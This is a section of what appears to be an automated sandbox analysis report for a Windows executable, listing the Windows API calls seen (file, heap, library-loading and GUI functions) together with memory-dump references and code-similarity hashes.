                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: ea8084a8e53392b49d5e5e1cc386c39d3a8fc02864ddcd5c00865955df8e12f9
                                                                                              • Instruction ID: 1667026f5002ced4cf6e1d09af0cf1483c0e046bce832241e75ed3c096825f01
                                                                                              • Opcode Fuzzy Hash: ea8084a8e53392b49d5e5e1cc386c39d3a8fc02864ddcd5c00865955df8e12f9
                                                                                              • Instruction Fuzzy Hash: 295154709243059FDB27CF31C8D16BBBBE9EF41300F15906EE096AB262D735A942CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,0031ACB0,?,?,00000000,?,?,00319C8B,?), ref: 0031AE3A
                                                                                              • GetLastError.KERNEL32(?,?,00319C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0031AE49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 0f3777aa29ff964151aae5b3c154a317b99927ba6bbc83ec6de9c83b5d2430b4
                                                                                              • Instruction ID: b2b2770a989356bc7c767af99fb1f22dccc38f7ac0988d61fd2d879410161445
                                                                                              • Opcode Fuzzy Hash: 0f3777aa29ff964151aae5b3c154a317b99927ba6bbc83ec6de9c83b5d2430b4
                                                                                              • Instruction Fuzzy Hash: 83412734205F458BD72EAE64E8946EA73A9FF4C313F11052AE84587E50DB71DCC48B63
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0033A515: GetLastError.KERNEL32(?,00353070,00335982,00353070,?,?,00335281,00000050,?,00353070,00000200), ref: 0033A519
                                                                                                • Part of subcall function 0033A515: _free.LIBCMT ref: 0033A54C
                                                                                                • Part of subcall function 0033A515: SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A58D
                                                                                                • Part of subcall function 0033A515: _abort.LIBCMT ref: 0033A593
                                                                                                • Part of subcall function 0033CD0E: _abort.LIBCMT ref: 0033CD40
                                                                                                • Part of subcall function 0033CD0E: _free.LIBCMT ref: 0033CD74
                                                                                                • Part of subcall function 0033C97B: GetOEMCP.KERNEL32(00000000,?,?,0033CC04,?), ref: 0033C9A6
                                                                                              • _free.LIBCMT ref: 0033CC5F
                                                                                              • _free.LIBCMT ref: 0033CC95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 7a4097d201ad9e39220ab496a393036efbe0ec3aac90bb24b6908fd175d409d1
                                                                                              • Instruction ID: fe47a2593c8d1e1abfb654cff985b8a709f98f57e8e4172ca27ea9ae3bf3647d
                                                                                              • Opcode Fuzzy Hash: 7a4097d201ad9e39220ab496a393036efbe0ec3aac90bb24b6908fd175d409d1
                                                                                              • Instruction Fuzzy Hash: 3A31D871904204AFDB16DF69D4C1B5DB7F5EF41320F251099F408AF2A1DB769D41DB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00317ED0,?,?,?,00000000), ref: 0031B04C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0031B100
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: 8f3e3d83e581bcfab83245e8e3f26912132f15ce80ad541e5d678e2b26b71b81
                                                                                              • Instruction ID: b6f5d4920523ff2ddb765170867bd69cdc471702fa7faf31783a8c15cd491b1b
                                                                                              • Opcode Fuzzy Hash: 8f3e3d83e581bcfab83245e8e3f26912132f15ce80ad541e5d678e2b26b71b81
                                                                                              • Instruction Fuzzy Hash: CC21F032248241ABC72ADE74C891AABFBE8AF5D304F05491CB4E1C7151D729E94C9B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0031B1B7,?,?,003181FD), ref: 0031A946
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0031B1B7,?,?,003181FD), ref: 0031A976
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 1277d521da878451fea27004502e6848b38ee8e2f867007433f26443dcbc2e96
                                                                                              • Instruction ID: 3f56bc1b6dbeaf5375c5cf589c43b7b1c46ebfd951be28013f4d433e8474807b
                                                                                              • Opcode Fuzzy Hash: 1277d521da878451fea27004502e6848b38ee8e2f867007433f26443dcbc2e96
                                                                                              • Instruction Fuzzy Hash: BB21D371504B486EE3718A65CC89BF776ECEB4D322F420A29F9D5C61C1C774A8C5C672
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00311F35
                                                                                                • Part of subcall function 003142F1: __EH_prolog.LIBCMT ref: 003142F6
                                                                                              • _wcslen.LIBCMT ref: 00311FDA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 5cef8e2ba561edc45e35c829315a2fe8cc800bf0528743c5f84ff892558aee08
                                                                                              • Instruction ID: 964c765a071c593b1b8ed47ed42d60b46efbf278600819734710398fdff4f5f6
                                                                                              • Opcode Fuzzy Hash: 5cef8e2ba561edc45e35c829315a2fe8cc800bf0528743c5f84ff892558aee08
                                                                                              • Instruction Fuzzy Hash: 2A218B32904218AFCF1AAF98DC919EEFBB6BF0C300F10052DF545AB6A1C7755992CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,003740C4,?,?,?,00334EF6,00000004,InitializeCriticalSectionEx,00347424,InitializeCriticalSectionEx,00000000,?,00334CAD,003740C4,00000FA0), ref: 00334D85
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00334D8F
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID:
• API String ID: 3013587201-0
• Opcode ID: a4cff0e7f2eb8cacb69c8cb36f28034f0f42ca0f678b022f9223fda4d024b321
• Instruction ID: 0721d24eecbc1f94922afec474fd8008a3a4ab7308577bf8e38dfe4a9cf3cc11
• Opcode Fuzzy Hash: a4cff0e7f2eb8cacb69c8cb36f28034f0f42ca0f678b022f9223fda4d024b321
• Instruction Fuzzy Hash: 1C118E36600515AF8B23DFA4E8C09AA77A8FB46350F250169E905DB251EB30FD41CBD0
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0031B157
• GetLastError.KERNEL32 ref: 0031B164
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: fdf806d8ea82a73910b588ab43508574e104101f3be742e30669492c5d160ea2
• Instruction ID: ed4d694defe38454e6240ca026078750a306e08b5f181058f1d842d74763919b
• Opcode Fuzzy Hash: fdf806d8ea82a73910b588ab43508574e104101f3be742e30669492c5d160ea2
• Instruction Fuzzy Hash: 5811CE31600700BBD72B8A28C855BE6F3E9AB09370F624638E553935D0E770AD85C660
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0031D6A7: _wcslen.LIBCMT ref: 0031D6AF
  • Part of subcall function 00323338: _wcslen.LIBCMT ref: 00323340
  • Part of subcall function 00323338: _wcslen.LIBCMT ref: 00323351
  • Part of subcall function 00323338: _wcslen.LIBCMT ref: 00323361
  • Part of subcall function 00323338: _wcslen.LIBCMT ref: 0032336F
  • Part of subcall function 00323338: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0031C844,?,?,00000000,?,?,?), ref: 0032338A
  • Part of subcall function 0032BC19: SetCurrentDirectoryW.KERNELBASE(?,0032BFF6,00361890,00000000,00362892,00000006), ref: 0032BC1D
• _wcslen.LIBCMT ref: 0032C00F
• SHFileOperationW.SHELL32(?,?,?,?,?,00362892,00000006), ref: 0032C048
Similarity
• API ID: _wcslen$CompareCurrentDirectoryFileOperationString
• String ID:
• API String ID: 1016385243-0
• Opcode ID: 7982c693b4f60c546587196a2bfedf3949d07e5d5ea104631b8ef1562079b290
• Instruction ID: 35b17abeb430633016cea1836d1050048241a31d588b83d03dadb34ab0b5e863
• Opcode Fuzzy Hash: 7982c693b4f60c546587196a2bfedf3949d07e5d5ea104631b8ef1562079b290
• Instruction Fuzzy Hash: 64014471D00268A5DF23ABA4ED0AEDF73FCAF08740F044465F605E7195E7B896848B95
Uniqueness
Uniqueness Score: -1.00%
APIs
• _free.LIBCMT ref: 0033A6C5
  • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
• HeapReAlloc.KERNEL32(00000000,?,?,?,?,003530C4,0031187A,?,?,00000007,?,?,?,003113F2,?,00000000), ref: 0033A701
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
• Opcode ID: f7c77c14ade51af60c2bde8671c3b7ba70a4a32387a311ab8d3f12373dd194e5
• Instruction ID: 0c7cd854db02483054246433481e3ea61aa97c16908e87296eeb9b3cf58b5550
• Opcode Fuzzy Hash: f7c77c14ade51af60c2bde8671c3b7ba70a4a32387a311ab8d3f12373dd194e5
• Instruction Fuzzy Hash: BFF0FC31101D10A7C7232B255CC3F5B375C9FC1BB0F1A4115F8956A0A1EF20DC409667
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 003223CA
• GetProcessAffinityMask.KERNEL32(00000000), ref: 003223D1
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: 17557415342a801f163e3c044f17f4b14e82097e012830bcc23c1630baf73315
• Instruction ID: b3667ee0d6371cd3adb15b313cc84bbcc71f4c2d23a73891c2d6db2ff21584fc
• Opcode Fuzzy Hash: 17557415342a801f163e3c044f17f4b14e82097e012830bcc23c1630baf73315
• Instruction Fuzzy Hash: D1E09A3AB10125BB8F1ACBA4BC059EBB2ECEA44304721817AA603E3100E978ED0546A0
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
  • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
• Opcode ID: 9f7019a6b07dc1ca71ce1daef8d885fc694ef9ff762c3b34fa123465671a8f7b
• Instruction ID: 55e7b044e9ee92093d071dff71a3d4ab5c16e06a8a964c0bbad0ee442e7a4dfe
• Opcode Fuzzy Hash: 9f7019a6b07dc1ca71ce1daef8d885fc694ef9ff762c3b34fa123465671a8f7b
• Instruction Fuzzy Hash: 8EF0A935144209BBDF129FA0CC00BDA77ACBF083C5F008060BA44DA164DB31EDA5DB60
Uniqueness
Uniqueness Score: -1.00%
APIs
• DeleteFileW.KERNELBASE(?,00000000,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B481
  • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
• DeleteFileW.KERNEL32(?,?,?,00000800,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B4AF
Similarity
• API ID: DeleteFile$_wcslen
• String ID:
• API String ID: 2643169976-0
• Opcode ID: 70cabd26ac691047648a01c9b156f54ea9d896796e77da20f877364df5137de5
• Instruction ID: 5b7145edb6cc117108e5b14871c54aa23feb6615c8aa65c6e762e4406ee1634a
• Opcode Fuzzy Hash: 70cabd26ac691047648a01c9b156f54ea9d896796e77da20f877364df5137de5
• Instruction Fuzzy Hash: 5BE022361402086BEB025B60CC00FDA736CBF08382F048030BA04CA091DF20ECD4DA10
Uniqueness
Uniqueness Score: -1.00%
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,?,0034380F,000000FF), ref: 0032BDB5
• OleUninitialize.OLE32(?,?,?,?,0034380F,000000FF), ref: 0032BDBA
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
• Opcode ID: 3af36da0c9c33952fdd6f2592b115cd888219634328a8e3134b6d7c10bf9ad71
• Instruction ID: df09d55252e5d3af66f2d98a65e7e14456b87c46c5db75b1b04007178ee85bfd
• Opcode Fuzzy Hash: 3af36da0c9c33952fdd6f2592b115cd888219634328a8e3134b6d7c10bf9ad71
• Instruction Fuzzy Hash: 30E03072504A50AFC7129B49DC05B49FBBDFB89B20F108226B41597760CB747801CA90
Uniqueness
Uniqueness Score: -1.00%
APIs
• _swprintf.LIBCMT ref: 0032F02C
  • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
• SetDlgItemTextW.USER32(00000065,?), ref: 0032F043
  • Part of subcall function 0032C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
  • Part of subcall function 0032C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
  • Part of subcall function 0032C758: IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
  • Part of subcall function 0032C758: TranslateMessage.USER32(?), ref: 0032C79C
  • Part of subcall function 0032C758: DispatchMessageW.USER32(?), ref: 0032C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 8fe3a6bba0671e86a0151abe5f1f4fbdec39130064ef14eb2570f3b1d245252f
                                                                                              • Instruction ID: 38939610cb5f99206a51fbde6b3a79f5cf696b540f2b5304b51af28232f56f61
                                                                                              • Opcode Fuzzy Hash: 8fe3a6bba0671e86a0151abe5f1f4fbdec39130064ef14eb2570f3b1d245252f
                                                                                              • Instruction Fuzzy Hash: 09E02BB14143483ADF036761DC0AFEE366C5F083CAF040061B2009A0B2D6B485509B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0031B4CA,?,00318042,?), ref: 0031B4E4
                                                                                                • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,0031B4CA,?,00318042,?), ref: 0031B510
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 629c62e57f80bb3f250167fb34f67d1b8daa5701398ee4d7864e1149963196a2
                                                                                              • Instruction ID: b0e9eeedf6fb973a9dedb65204111f7f93edd8a4a7a167d2fb61a2a2905516eb
                                                                                              • Opcode Fuzzy Hash: 629c62e57f80bb3f250167fb34f67d1b8daa5701398ee4d7864e1149963196a2
                                                                                              • Instruction Fuzzy Hash: 0AE0D8355402287BCB22AB64DC04BD9B76DAB0E3E1F010170FE45E71A5DB70AD80CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: 7271c2acc1510baf508d1d122f7d1a7a2ae1b690c0f3247249a727a23085a83c
                                                                                              • Instruction ID: 7c089b1e3a586191de6f4d64d1247942cef2f69923e74b294ed6fc0ec01e5a35
                                                                                              • Opcode Fuzzy Hash: 7271c2acc1510baf508d1d122f7d1a7a2ae1b690c0f3247249a727a23085a83c
                                                                                              • Instruction Fuzzy Hash: 8AE048775001286ADB1297A4DD05FDA776CEF1D7C1F0400757645E6004DA74EA84CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0032B3E9
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0032B3F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: d87e637daed3fafcc2c4a7936a3f3b69ae89bba4784c08ff003c0c303875a481
                                                                                              • Instruction ID: 5176885e29d2cb008b97f10765d6ba7d13bd0b0e5411c733f69a82a0ea40d117
                                                                                              • Opcode Fuzzy Hash: d87e637daed3fafcc2c4a7936a3f3b69ae89bba4784c08ff003c0c303875a481
                                                                                              • Instruction Fuzzy Hash: 09E01275900228EFDB21DF99D54179DB7F8EF04350F20807EE99597601D374AE449B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00333D3A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00333D45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 1d17ecdf922360ed3ebaf766614473f0181f1b30b37c490383e7a5680b2850cb
                                                                                              • Instruction ID: 0eb2e0e423b27e3d160355d8f689fc9f549bf99f7a20fb957b83bd4e32e5a4f0
                                                                                              • Opcode Fuzzy Hash: 1d17ecdf922360ed3ebaf766614473f0181f1b30b37c490383e7a5680b2850cb
                                                                                              • Instruction Fuzzy Hash: DBD02236448702148C1B33782CC38995348A811B71FE1E746E0309E4E2EF18E6806022
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
